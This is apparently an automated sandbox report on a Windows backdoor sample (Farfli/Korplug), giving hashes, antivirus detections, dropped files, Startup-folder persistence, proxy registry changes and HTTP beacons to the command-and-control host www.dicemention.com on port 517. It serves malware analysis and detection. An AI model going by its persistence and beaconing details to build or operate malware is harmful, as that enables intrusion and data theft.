Analysis Date: 2015-10-10 23:04:19
MD5: c824cb1c177c548c533879840bd8851c
SHA1: 6b6f0d172024b1c0bde5c3b0704658f0f0ebb05b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 4a9784dbfe142f95e46184f8742cf9ba sha1: 749840b01b010da254cb4c4bb86aeaa81172eae7 size: 36864
Section .rdata: md5: 06d4b26cae87ac7c7cf9ff129a3b6793 sha1: 39fa67b14d299408f34b258e85b877bffc0e8966 size: 8192
Section .data: md5: cb1a40b45fdc2cce6d76f53b41d65d50 sha1: 69e9d476c86a45fdaadcab633151448a0813c591 size: 4096
Section .rsrc: md5: 346115fba14f9862c513c964a6cfb67f sha1: 5491bd1625af410654adbe004e775be2933bea9c size: 24576
Timestamp: 2013-12-16 08:12:37
Packer: Installer VISE Custom
PEhash: b679ebb370bd4988e8680a3404391a166ccd3857
IMPhash: 777db06aaa83535226d79429f93d3115
AV Rising: no_virus
AV Mcafee: Generic.dx!C824CB1C177C
AV Avira (antivir): BDS/Farfli.BH.3
AV Twister: Trojan.DOMG.hypg
AV Ad-Aware: Gen:Variant.Graftor.138021
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Farfli.AUP
AV Grisoft (avg): BackDoor.Generic18.ABUX.dropper
AV Symantec: Backdoor.Korplug
AV Fortinet: W32/Farfli.AUP!tr
AV BitDefender: Gen:Variant.Graftor.138021
AV K7: Trojan ( 004994471 )
AV Microsoft Security Essentials: Backdoor:Win32/Farfli.BH
AV MicroWorld (escan): Gen:Variant.Graftor.138021[ZP]
AV MalwareBytes: no_virus
AV Authentium: no_virus
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.Win32.Agent
AV Emsisoft: Gen:Variant.Graftor.138021
AV Zillya!: Trojan.Farfli.Win32.22475
AV Kaspersky: Backdoor.Win32.Gulpix.aue
AV Trend Micro: BKDR_FARFLI.XXVB
AV CAT (quickheal): Backdoor.Farfli.r4
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Graftor.138021
AV Arcabit (arcavir): Gen:Variant.Graftor.138021
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader9.52768
AV F-Secure: no_virus
AV CA (E-Trust Ino): Win32/FakeDoc_i

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\winlog.lnk
Creates File: PIPE\wkssvc
Creates File: PIPE\srvsvc
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\winlog.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\winlog.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc

Process
↳ C:\Documents and Settings\Administrator\Application Data\winlog.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Application Data\winlog.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.dicemention.com

Network Details:

DNS: www.dicemention.com
Type: A
123.108.111.228
HTTP GET: http://www.dicemention.com:517/30105909000024FE010032443746363736443731363737393246004E4F52544857494E2D44333933314400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070241646D696E6973747261746F72000000000000000000000000000000000000000000000000004330353939303041000000000000000000000000000000000000000000000000000000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
HTTP GET: http://www.dicemention.com:517/30105909000024FE010032443746363736443731363737393246004E4F52544857494E2D44333933314400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070241646D696E6973747261746F72000000000000000000000000000000000000000000000000004330353939303041000000000000000000000000000000000000000000000000000000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
Flows TCP: 192.168.1.1:1031 ➝ 123.108.111.228:517
Flows TCP: 192.168.1.1:1032 ➝ 123.108.111.228:517

Raw Pcap

Strings